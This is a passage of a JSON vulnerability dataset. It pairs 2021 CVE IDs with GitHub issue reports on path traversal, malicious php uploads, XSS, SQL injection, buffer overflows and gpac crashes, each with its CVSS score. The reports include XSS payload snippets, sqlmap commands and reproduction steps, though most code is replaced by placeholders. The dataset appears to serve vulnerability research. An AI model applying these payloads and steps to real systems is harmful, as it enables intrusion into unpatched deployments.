  70767. "description": "unsquashfs unvalidated filepaths allow writing outside of destination. Squashfs stores the filename in the directory entry, this is then used by ERRORTAG to create the new file during the unsquash. The filename is not validated for traversal outside of the destination directory, this allows writing to locations outside of the destination, such as APITAG which could lead to code execution. To test this, the following change can be made to mksquashfs : URLTAG ERRORTAG Recompile mksquashfs and then create the \"bad\" squashfs image. The first example is using a directory traversal, (this is easiest done in a Docker container) ERRORTAG This works pretty well since the ERRORTAG ends up prepending the file data to an existing file, or creating the file+path if it does not exist. The same can be done with a symlink. Same steps as before except additional file is added to the poc folder: APITAG Attached are two poc squashfs images, one with directory traversal and the other with symlink. Both will end up creating the file APITAG ERRORTAG Sample squashfs images FILETAG",
  70768. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
  70769. "severity": "HIGH",
  70770. "baseScore": 8.1,
  70771. "impactScore": 5.2,
  70772. "exploitabilityScore": 2.8
  70773. },
  70774. {
  70775. "CVE_ID": "CVE-2021-40188",
  70776. "Issue_Url_old": "https://github.com/PHPFusion/PHPFusion/issues/2372",
  70777. "Issue_Url_new": "https://github.com/phpfusion/phpfusion/issues/2372",
  70778. "Repo_new": "phpfusion/phpfusion",
  70779. "Issue_Created_At": "2021-08-24T22:29:42Z",
  70780. "description": "File Manager does not filter php extension lead to Upload malicious files. By APITAG From In NUMBERTAG cta team, HPT Cyber Security Center Describe the bug File Manager function in admin panel does not filter all of php extensions like FILETAG , .php7, .phtml, .php5, ...\", The attacker can upload malicious file and execute code in server Version APITAG version: APITAG NUMBERTAG To Reproduce Steps to reproduce the behavior NUMBERTAG Go to administrator panel and click on APITAG function NUMBERTAG Click on Upload file button, then choose .php file NUMBERTAG The path of file will return in response NUMBERTAG Finally, access and execute code on server Screenshots FILETAG Request and response of function FILETAG Execute code on server: FILETAG Additional context Although APITAG have NUMBERTAG step verification for administrator panel, but if cookie of admin users were stolen, the attacker can POST request upload file with that cookie and execute code on server REQUEST: ERRORTAG RESPONSE: CODETAG",
  70781. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  70782. "severity": "HIGH",
  70783. "baseScore": 7.2,
  70784. "impactScore": 5.9,
  70785. "exploitabilityScore": 1.2
  70786. },
  70787. {
  70788. "CVE_ID": "CVE-2021-40191",
  70789. "Issue_Url_old": "https://github.com/zyx0814/dzzoffice/issues/196",
  70790. "Issue_Url_new": "https://github.com/zyx0814/dzzoffice/issues/196",
  70791. "Repo_new": "zyx0814/dzzoffice",
  70792. "Issue_Created_At": "2021-08-28T04:19:09Z",
  70793. "description": "Lacking of sanitizer APITAG lead to Cross site Scripting in Upload function. Author: APITAG from NUMBERTAG n NUMBERTAG cta team, HPT APITAG Center Email: EMAILTAG Submit date: PATHTAG Target: FILETAG Version NUMBERTAG FILETAG Description: Because of lacking of sanitizer of input data at all of upload functions in APITAG and return wrong response content type of output data in APITAG , The Authenticated user (not an admin) can injection malicious code into APITAG and craft a specific html file, then user click on that file the script will be executed. To Reproduce Steps to reproduce the behavior NUMBERTAG Go to any textarea form and use upload function NUMBERTAG Inject malicious script into APITAG like <img src=x onerror=alert NUMBERTAG Craft an specific html file to send request to server in webclient, when user click on that file malicious script will be executed Request ERRORTAG IMAGE FILETAG FILETAG FILETAG FILETAG Response ERRORTAG",
  70794. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  70795. "severity": "MEDIUM",
  70796. "baseScore": 5.4,
  70797. "impactScore": 2.7,
  70798. "exploitabilityScore": 2.3
  70799. },
  70800. {
  70801. "CVE_ID": "CVE-2021-4021",
  70802. "Issue_Url_old": "https://github.com/radareorg/radare2/issues/19436",
  70803. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/19436",
  70804. "Repo_new": "radareorg/radare2",
  70805. "Issue_Created_At": "2021-11-23T14:42:29Z",
  70806. "description": "APITAG analysing ELF NUMBERTAG binary for MIPS architecture. Environment ERRORTAG Description We found with MENTIONTAG an ELF NUMBERTAG binary for MIPS architecture that hangs when analysed. We think this is caused by mapping a huge section that is interpreted as NOPs. If we modify the size of the section, the analysis doesn't hang. While this is not an infinite loop, it can be very long. And this has been acknowledged as a APITAG in the past (see NUMBERTAG Test CODETAG APITAG ERRORTAG ERRORTAG CODETAG",
  70807. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  70808. "severity": "HIGH",
  70809. "baseScore": 7.5,
  70810. "impactScore": 3.6,
  70811. "exploitabilityScore": 3.9
  70812. },
  70813. {
  70814. "CVE_ID": "CVE-2021-40239",
  70815. "Issue_Url_old": "https://github.com/Gabe-commiter/Miniftpd/issues/2",
  70816. "Issue_Url_new": "https://github.com/gabe-commiter/miniftpd/issues/2",
  70817. "Repo_new": "gabe-commiter/miniftpd",
  70818. "Issue_Created_At": "2021-08-24T18:07:12Z",
  70819. "description": "APITAG trigger buffer overflow on APITAG function. Hi MENTIONTAG I found a issue, that can trigger buffer overflow on your application. The issue exists on APITAG function (from line NUMBERTAG to NUMBERTAG on ftpproto.c At glance, we can see you defined APITAG , it's not problem, however, when you use APITAG on line NUMBERTAG and NUMBERTAG they trigger bufferoverflow. ERRORTAG ERRORTAG Solution : Please use APITAG to limit maximum input characters. See: URLTAG",
  70820. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  70821. "severity": "CRITICAL",
  70822. "baseScore": 9.8,
  70823. "impactScore": 5.9,
  70824. "exploitabilityScore": 3.9
  70825. },
  70826. {
  70827. "CVE_ID": "CVE-2021-40292",
  70828. "Issue_Url_old": "https://github.com/zyx0814/dzzoffice/issues/195",
  70829. "Issue_Url_new": "https://github.com/zyx0814/dzzoffice/issues/195",
  70830. "Repo_new": "zyx0814/dzzoffice",
  70831. "Issue_Created_At": "2021-08-28T04:05:10Z",
  70832. "description": "Lacking of sanitizer of input data lead to Stored XSS. Author: APITAG from NUMBERTAG n NUMBERTAG cta team, HPT APITAG Center Email: EMAILTAG Submit date: PATHTAG Target: FILETAG Version NUMBERTAG FILETAG Description: Because of lacking of sanitizer of input data, attacker can injection malicious code into settingnew param to trigger Stored XSS. The vulnerability can affected APITAG and APITAG in template FILETAG FILETAG XSS NUMBERTAG Steps to reproduce the behavior NUMBERTAG Go to Setting settings > Login settings NUMBERTAG Update Registration link name to APITAG NUMBERTAG Click Save changes Request CODETAG Response ERRORTAG APITAG FILETAG FILETAG",
  70833. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  70834. "severity": "MEDIUM",
  70835. "baseScore": 5.4,
  70836. "impactScore": 2.7,
  70837. "exploitabilityScore": 2.3
  70838. },
  70839. {
  70840. "CVE_ID": "CVE-2021-40313",
  70841. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1469",
  70842. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1469",
  70843. "Repo_new": "piwigo/piwigo",
  70844. "Issue_Created_At": "2021-08-29T05:50:52Z",
  70845. "description": "FILETAG then i got APITAG The point of vulnerability is in APITAG parameter selection is not filtered FILETAG Unfiltered parametersselection is spliced FILETAG The next step is to capture packets using APITAG by simply constructing parameters APITAG Remember to replace the value of the token above FILETAG Save parameters to file\uff0cthen just use sqlmap to exploit python sqlmap.py r NUMBERTAG current db FILETAG",
  70846. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  70847. "severity": "HIGH",
  70848. "baseScore": 8.8,
  70849. "impactScore": 5.9,
  70850. "exploitabilityScore": 2.8
  70851. },
  70852. {
  70853. "CVE_ID": "CVE-2021-40317",
  70854. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1470",
  70855. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1470",
  70856. "Repo_new": "piwigo/piwigo",
  70857. "Issue_Created_At": "2021-08-29T13:49:36Z",
  70858. "description": "FILETAG Then we can see: FILETAG Select default, use Burpsuite during clicking APPLY. FILETAG Then in sqlmap: python sqlmap.py r FILETAG o APITAG FILETAG See APITAG FILETAG Here there seems to be no confirmation of the legitimacy of the parameter $_POST FILETAG",
  70859. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  70860. "severity": "HIGH",
  70861. "baseScore": 8.8,
  70862. "impactScore": 5.9,
  70863. "exploitabilityScore": 2.8
  70864. },
  70865. {
  70866. "CVE_ID": "CVE-2021-4048",
  70867. "Issue_Url_old": "https://github.com/JuliaLang/julia/issues/42415",
  70868. "Issue_Url_new": "https://github.com/julialang/julia/issues/42415",
  70869. "Repo_new": "julialang/julia",
  70870. "Issue_Created_At": "2021-09-28T18:29:48Z",
  70871. "description": "stegr! call segfault. MENTIONTAG alerted us to segfaults that were occurring on some machines during CI builds while running the APITAG test. Using rr, we were able to trace these segfaults back to a call to APITAG in lapack.jl URLTAG While we ran out of time to fully debug and fix this, we have a MWE that replicates the problem on AMD machines. Here's the MWE: CODETAG CC: MENTIONTAG",
  70872. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  70873. "severity": "CRITICAL",
  70874. "baseScore": 9.1,
  70875. "impactScore": 5.2,
  70876. "exploitabilityScore": 3.9
  70877. },
  70878. {
  70879. "CVE_ID": "CVE-2021-40523",
  70880. "Issue_Url_old": "https://github.com/contiki-os/contiki/issues/2686",
  70881. "Issue_Url_new": "https://github.com/contiki-os/contiki/issues/2686",
  70882. "Repo_new": "contiki-os/contiki",
  70883. "Issue_Created_At": "2021-08-08T13:42:02Z",
  70884. "description": "Incorrectly handling negotiated options of telnet servers. Hello, In the implementation of telnet servers until version NUMBERTAG and even the latest commit NUMBERTAG b5b NUMBERTAG telnet servers incorrectly handle negotiated options. According to the general constraints of RFC NUMBERTAG URLTAG , during negotiating some disabled command options or unnegotiated commands, telnet servers must give WILL/WONT or DO/DONT response for DO and WILL commands, respectively. However, telnet servers may not give any responses in this case. This bug appears as telnet servers put all responses in a fixed length buffer in the implementation. Telnet servers only put messages into buffer but don't have a check whether successfully or not. Hence, when the buffer is full, it can lead to responses lost. This bug could lead to clients waiting forever and other effects. Could you have a check? Thanks a lot.",
  70885. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  70886. "severity": "HIGH",
  70887. "baseScore": 7.5,
  70888. "impactScore": 3.6,
  70889. "exploitabilityScore": 3.9
  70890. },
  70891. {
  70892. "CVE_ID": "CVE-2021-40541",
  70893. "Issue_Url_old": "https://github.com/PHPFusion/PHPFusion/issues/2373",
  70894. "Issue_Url_new": "https://github.com/phpfusion/phpfusion/issues/2373",
  70895. "Repo_new": "phpfusion/phpfusion",
  70896. "Issue_Created_At": "2021-08-25T03:33:12Z",
  70897. "description": "Cross site Scripting bypass in APITAG function. APITAG From In NUMBERTAG cta Team, HPT Cyber Security Center Describe the bug preg patterns filter html tag without \"//\" in APITAG function, the authenticated user can trigger xss by append \"//\" in the end of text Version APITAG version: APITAG NUMBERTAG To Reproduce Steps to reproduce the behavior NUMBERTAG Go to any post textarea function NUMBERTAG Add \"<svg onload=alert NUMBERTAG in textarea form and submit NUMBERTAG When authenticated user or admin use preview html function the malicious script will be executed, even the attacker can store malicious script when admin publish submission Screenshots preg pattern filter html tag without \"//\" in the end of html FILETAG User preview and submit submission FILETAG Admin preview submission of user FILETAG Admin publish submission and the attacker can store malicious script FILETAG Additional context REQUEST: CODETAG RESPONSE: CODETAG",
  70898. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  70899. "severity": "MEDIUM",
  70900. "baseScore": 6.1,
  70901. "impactScore": 2.7,
  70902. "exploitabilityScore": 2.8
  70903. },
  70904. {
  70905. "CVE_ID": "CVE-2021-40542",
  70906. "Issue_Url_old": "https://github.com/OS4ED/openSIS-Classic/issues/189",
  70907. "Issue_Url_new": "https://github.com/os4ed/opensis-classic/issues/189",
  70908. "Repo_new": "os4ed/opensis-classic",
  70909. "Issue_Created_At": "2021-09-01T09:41:11Z",
  70910. "description": "Unauthenticated Reflect Cross site Scripting in FILETAG file. Author: APITAG from NUMBERTAG n NUMBERTAG cta team, HPT APITAG Center Email: EMAILTAG Submit date: PATHTAG Target: FILETAG Version NUMBERTAG FILETAG Description: Because of lacking of sanitizer of input data at APITAG in APITAG file, The Unauthenticated user can inject and execute javascript code on APITAG parameter FILETAG Testing on local site: FILETAG Testing on demo site: FILETAG To Reproduce XSS NUMBERTAG Steps to reproduce the behavior NUMBERTAG Acess APITAG file NUMBERTAG Add APITAG behind APITAG file NUMBERTAG The backend will echo and execute malicious script Request ERRORTAG Response ERRORTAG",
  70911. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  70912. "severity": "MEDIUM",
  70913. "baseScore": 6.1,
  70914. "impactScore": 2.7,
  70915. "exploitabilityScore": 2.8
  70916. },
  70917. {
  70918. "CVE_ID": "CVE-2021-40543",
  70919. "Issue_Url_old": "https://github.com/OS4ED/openSIS-Classic/issues/191",
  70920. "Issue_Url_new": "https://github.com/os4ed/opensis-classic/issues/191",
  70921. "Repo_new": "os4ed/opensis-classic",
  70922. "Issue_Created_At": "2021-09-01T10:55:25Z",
  70923. "description": "Unauthenticated SQL Injection in FILETAG file. Author: APITAG from NUMBERTAG n NUMBERTAG cta team, HPT APITAG Center Email: EMAILTAG Submit date: PATHTAG Target: FILETAG Version NUMBERTAG FILETAG Description: Because of lacking of sanitizer of input data at two parameters APITAG and APITAG in APITAG file, The Unauthenticated user can inject sql code and get all informations in database FILETAG Use sqlmap tool dump users of database FILETAG To Reproduce SQL INJECTION Steps to reproduce the behavior NUMBERTAG Acess APITAG file NUMBERTAG Add APITAG behind APITAG file Request CODETAG Response CODETAG",
  70924. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  70925. "severity": "CRITICAL",
  70926. "baseScore": 9.8,
  70927. "impactScore": 5.9,
  70928. "exploitabilityScore": 3.9
  70929. },
  70930. {
  70931. "CVE_ID": "CVE-2021-40559",
  70932. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1886",
  70933. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1886",
  70934. "Repo_new": "gpac/gpac",
  70935. "Issue_Created_At": "2021-08-24T07:11:15Z",
  70936. "description": "Segmentation fault casued by null pointer dereference using mp4box in naludmx_parse_nal_avc, APITAG FILETAG (unzip first) Here is the trace reported by gdb NUMBERTAG ac NUMBERTAG in naludmx_parse_nal_avc (ct NUMBERTAG a NUMBERTAG data NUMBERTAG f NUMBERTAG tr NUMBERTAG size NUMBERTAG e, nal_type NUMBERTAG skip_nal NUMBERTAG fffffff4fc4, is_slice NUMBERTAG fffffff4fd0, is_islice NUMBERTAG fffffff4fd4) at PATHTAG NUMBERTAG ad7d3 in naludmx_process (filter NUMBERTAG cbe0) at PATHTAG NUMBERTAG a0 in gf_filter_process_task (task NUMBERTAG eee0) at PATHTAG NUMBERTAG c in gf_fs_thread_proc (sess_thread NUMBERTAG e0) at PATHTAG NUMBERTAG in gf_fs_run (fsess NUMBERTAG at PATHTAG NUMBERTAG ea in gf_media_import (importer NUMBERTAG fffffff5bf0) at PATHTAG NUMBERTAG cdf9 in convert_file_info APITAG \"tmp\", APITAG at PATHTAG NUMBERTAG c3 in APITAG (argc NUMBERTAG arg NUMBERTAG fffffffddb8) at PATHTAG NUMBERTAG d6b in main (argc NUMBERTAG arg NUMBERTAG fffffffddb8) at PATHTAG NUMBERTAG caaa NUMBERTAG in generic_start_main NUMBERTAG caaff5 in __libc_start_main NUMBERTAG f NUMBERTAG in _start () ~~~~",
  70937. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70938. "severity": "MEDIUM",
  70939. "baseScore": 5.5,
  70940. "impactScore": 3.6,
  70941. "exploitabilityScore": 1.8
  70942. },
  70943. {
  70944. "CVE_ID": "CVE-2021-40562",
  70945. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1901",
  70946. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1901",
  70947. "Repo_new": "gpac/gpac",
  70948. "Issue_Created_At": "2021-08-29T14:05:34Z",
  70949. "description": "Segmentation fault caused by floating point exception using mp4box in naludmx_enqueue_or_dispatch, APITAG FILETAG (unzip first) Program output: ~~~~ [AVC|H NUMBERTAG Possible Variable Frame Rate: VUI \"fixed_frame_rate_flag\" absent [AVC|H NUMBERTAG Warning: Error parsing NAL unit [AVC|H NUMBERTAG Error parsing Sequence Param Set APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! [AVC|H NUMBERTAG Possible Variable Frame Rate: VUI \"fixed_frame_rate_flag\" absent [AVC|H NUMBERTAG Possible Variable Frame Rate: VUI \"fixed_frame_rate_flag\" absent [AVC|H NUMBERTAG Possible Variable Frame Rate: VUI \"fixed_frame_rate_flag\" absent [AVC|H NUMBERTAG Possible Variable Frame Rate: VUI \"fixed_frame_rate_flag\" absent [AVC|H NUMBERTAG Possible Variable Frame Rate: VUI \"fixed_frame_rate_flag\" absent Floating point exception (core dumped) ~~~~ Here is the trace reported by gdb: ~~~~ Stopped reason: SIGFPE gef\u27a4 bt NUMBERTAG ee NUMBERTAG in naludmx_enqueue_or_dispatch (ct NUMBERTAG ada NUMBERTAG n_pck NUMBERTAG flush_ref=<optimized out>) at PATHTAG NUMBERTAG e NUMBERTAG in naludmx_process APITAG at PATHTAG NUMBERTAG f4a in naludmx_process (filter NUMBERTAG a0bd0) at PATHTAG NUMBERTAG fe4c NUMBERTAG in gf_filter_process_task (task NUMBERTAG ed0) at PATHTAG NUMBERTAG f7b NUMBERTAG in gf_fs_thread_proc APITAG at PATHTAG NUMBERTAG f NUMBERTAG in gf_fs_run (fsess=fsess APITAG at PATHTAG NUMBERTAG c NUMBERTAG b4b in gf_media_import APITAG at PATHTAG NUMBERTAG in convert_file_info APITAG \"tmp\", APITAG at PATHTAG NUMBERTAG aaa in APITAG (argc=<optimized out>, argv=<optimized out>) at PATHTAG NUMBERTAG f NUMBERTAG bb6 in generic_start_main NUMBERTAG f NUMBERTAG a5 in __libc_start_main NUMBERTAG c4e9 in _start () ~~~~",
  70950. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70951. "severity": "MEDIUM",
  70952. "baseScore": 5.5,
  70953. "impactScore": 3.6,
  70954. "exploitabilityScore": 1.8
  70955. },
  70956. {
  70957. "CVE_ID": "CVE-2021-40563",
  70958. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1892",
  70959. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1892",
  70960. "Repo_new": "gpac/gpac",
  70961. "Issue_Created_At": "2021-08-25T07:12:15Z",
  70962. "description": "Segmentation fault casued by null pointer dereference using mp4box in APITAG APITAG FILETAG (unzip first) Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef\u27a4 bt NUMBERTAG in APITAG (ctx=ctx APITAG dsi=dsi APITAG APITAG APITAG APITAG APITAG max_height NUMBERTAG fffffff4d NUMBERTAG max_enh_width NUMBERTAG fffffff4d NUMBERTAG APITAG sar NUMBERTAG fffffff4d NUMBERTAG at PATHTAG NUMBERTAG ab in naludmx_check_pid APITAG ctx=ctx APITAG at PATHTAG NUMBERTAG in naludmx_process (filter NUMBERTAG a0bd0) at PATHTAG NUMBERTAG fe4c NUMBERTAG in gf_filter_process_task (task NUMBERTAG ed0) at PATHTAG NUMBERTAG f7b NUMBERTAG in gf_fs_thread_proc APITAG at PATHTAG NUMBERTAG f NUMBERTAG in gf_fs_run (fsess=fsess APITAG at PATHTAG NUMBERTAG c NUMBERTAG b4b in gf_media_import APITAG at PATHTAG NUMBERTAG in convert_file_info APITAG \"tmp\", APITAG at PATHTAG NUMBERTAG aaa in APITAG (argc=<optimized out>, argv=<optimized out>) at PATHTAG NUMBERTAG f NUMBERTAG bb6 in generic_start_main NUMBERTAG f NUMBERTAG a5 in __libc_start_main NUMBERTAG c4e9 in _start () ~~~~ The reason for this bug is that the program does not check the nullity of the pointer. APITAG",
  70963. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70964. "severity": "MEDIUM",
  70965. "baseScore": 5.5,
  70966. "impactScore": 3.6,
  70967. "exploitabilityScore": 1.8
  70968. },
  70969. {
  70970. "CVE_ID": "CVE-2021-40565",
  70971. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1902",
  70972. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1902",
  70973. "Repo_new": "gpac/gpac",
  70974. "Issue_Created_At": "2021-08-29T14:14:22Z",
  70975. "description": "Segmentation fault caused by null pointer dereference using mp4box in gf_avc_parse_nalu, APITAG FILETAG (unzip first) Program output: ~~~~ APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG corrupted exp golomb code NUMBERTAG leading zeros, ma NUMBERTAG allowed ! APITAG corrupted exp golomb code NUMBERTAG leading zeros, ma NUMBERTAG allowed ! APITAG corrupted exp golomb code NUMBERTAG leading zeros, ma NUMBERTAG allowed ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG corrupted exp golomb code NUMBERTAG leading zeros, ma NUMBERTAG allowed ! APITAG corrupted exp golomb code NUMBERTAG leading zeros, ma NUMBERTAG allowed ! APITAG corrupted exp golomb code NUMBERTAG leading zeros, ma NUMBERTAG allowed ! APITAG corrupted exp golomb code NUMBERTAG leading zeros, ma NUMBERTAG allowed ! APITAG corrupted exp golomb code NUMBERTAG leading zeros, ma NUMBERTAG allowed ! Segmentation fault (core dumped) ~~~~ Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef\u27a4 bt NUMBERTAG bd NUMBERTAG in gf_avc_parse_nalu (bs=<optimized out>, avc NUMBERTAG ae NUMBERTAG at PATHTAG NUMBERTAG d in naludmx_parse_nal_avc (is_islice=<synthetic pointer>, is_slice=<synthetic pointer>, skip_nal=<synthetic pointer>, nal_type NUMBERTAG size NUMBERTAG b, data NUMBERTAG e NUMBERTAG ct NUMBERTAG ada NUMBERTAG at PATHTAG NUMBERTAG naludmx_process (filter NUMBERTAG a0bd0) at PATHTAG NUMBERTAG fe4c NUMBERTAG in gf_filter_process_task (task NUMBERTAG d NUMBERTAG at PATHTAG NUMBERTAG f7b NUMBERTAG in gf_fs_thread_proc APITAG at PATHTAG NUMBERTAG f NUMBERTAG in gf_fs_run (fsess=fsess APITAG at PATHTAG NUMBERTAG c NUMBERTAG b4b in gf_media_import APITAG at PATHTAG NUMBERTAG in convert_file_info APITAG \"tmp\", APITAG at PATHTAG NUMBERTAG aaa in APITAG (argc=<optimized out>, argv=<optimized out>) at PATHTAG NUMBERTAG f NUMBERTAG bb6 in generic_start_main NUMBERTAG f NUMBERTAG a5 in __libc_start_main NUMBERTAG c4e9 in _start () ~~~~",
  70976. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70977. "severity": "MEDIUM",
  70978. "baseScore": 5.5,
  70979. "impactScore": 3.6,
  70980. "exploitabilityScore": 1.8
  70981. },
  70982. {
  70983. "CVE_ID": "CVE-2021-40566",
  70984. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1887",
  70985. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1887",
  70986. "Repo_new": "gpac/gpac",
  70987. "Issue_Created_At": "2021-08-24T08:04:48Z",
  70988. "description": "Segmentation fault casued by null pointer dereference using mp4box in mpgviddmx_process, APITAG FILETAG (unzip first) Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef\u27a4 bt NUMBERTAG cf5a9b in memcpy NUMBERTAG a NUMBERTAG a7 in mpgviddmx_process (filter NUMBERTAG cbd0) at PATHTAG NUMBERTAG a0 in gf_filter_process_task (task NUMBERTAG a0e0) at PATHTAG NUMBERTAG c in gf_fs_thread_proc (sess_thread NUMBERTAG b0) at PATHTAG NUMBERTAG in gf_fs_run (fsess NUMBERTAG at PATHTAG NUMBERTAG ea in gf_media_import (importer NUMBERTAG fffffff5c NUMBERTAG at PATHTAG NUMBERTAG cdf9 in convert_file_info APITAG \"tmp\", APITAG at PATHTAG NUMBERTAG c3 in APITAG (argc NUMBERTAG arg NUMBERTAG fffffffdde8) at PATHTAG NUMBERTAG d6b in main (argc NUMBERTAG arg NUMBERTAG fffffffdde8) at PATHTAG NUMBERTAG caaa NUMBERTAG in generic_start_main NUMBERTAG caaff5 in __libc_start_main NUMBERTAG f NUMBERTAG in _start () ~~~~ The reason for this bug is that the program does not check the nullity of the pointer before copy memory to it. APITAG",
  70989. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70990. "severity": "MEDIUM",
  70991. "baseScore": 5.5,
  70992. "impactScore": 3.6,
  70993. "exploitabilityScore": 1.8
  70994. },
  70995. {
  70996. "CVE_ID": "CVE-2021-40567",
  70997. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1889",
  70998. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1889",
  70999. "Repo_new": "gpac/gpac",
  71000. "Issue_Created_At": "2021-08-24T11:14:59Z",
  71001. "description": "Segmentation fault using mp4box in gf_odf_size_descriptor, APITAG FILETAG (unzip first) Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef\u27a4 bt NUMBERTAG a NUMBERTAG e8 in gf_odf_size_descriptor (desc NUMBERTAG e NUMBERTAG a0, APITAG at PATHTAG NUMBERTAG aeaaee in gf_odf_size_dcd (dcd NUMBERTAG fffffff6ae0, APITAG at PATHTAG NUMBERTAG a NUMBERTAG b NUMBERTAG in gf_odf_size_descriptor APITAG APITAG at PATHTAG NUMBERTAG aeade9 in gf_odf_write_dcd (bs NUMBERTAG a NUMBERTAG dcd NUMBERTAG fffffff6ae0) at PATHTAG NUMBERTAG a NUMBERTAG bd in gf_odf_write_descriptor (bs=bs APITAG APITAG at PATHTAG NUMBERTAG af NUMBERTAG in gf_odf_desc_write_bs APITAG bs=bs APITAG at PATHTAG NUMBERTAG af NUMBERTAG b7 in gf_odf_desc_write APITAG APITAG APITAG at PATHTAG NUMBERTAG af NUMBERTAG f6 in gf_odf_desc_copy APITAG APITAG at PATHTAG NUMBERTAG d2a3f in gf_isom_set_extraction_slc APITAG APITAG APITAG APITAG at PATHTAG NUMBERTAG ce NUMBERTAG ff in gf_hinter_finalize (file=file APITAG APITAG out>, APITAG at PATHTAG NUMBERTAG c NUMBERTAG in APITAG (file NUMBERTAG c NUMBERTAG APITAG max_ptime NUMBERTAG rtp_rate NUMBERTAG base_flags=<optimized out>, copy_data=GF_FALSE, interleave=GF_FALSE, regular_iod=GF_FALSE, single_group=GF_FALSE, hint_no_offset=GF_FALSE) at PATHTAG NUMBERTAG bd NUMBERTAG in APITAG (argc=<optimized out>, argv=<optimized out>) at PATHTAG NUMBERTAG f NUMBERTAG bb6 in generic_start_main NUMBERTAG f NUMBERTAG a5 in __libc_start_main NUMBERTAG c4e9 in _start () ~~~~",
  71002. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  71003. "severity": "MEDIUM",
  71004. "baseScore": 5.5,
  71005. "impactScore": 3.6,
  71006. "exploitabilityScore": 1.8
  71007. },
  71008. {
  71009. "CVE_ID": "CVE-2021-40569",
  71010. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1890",
  71011. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1890",
  71012. "Repo_new": "gpac/gpac",
  71013. "Issue_Created_At": "2021-08-25T05:36:34Z",
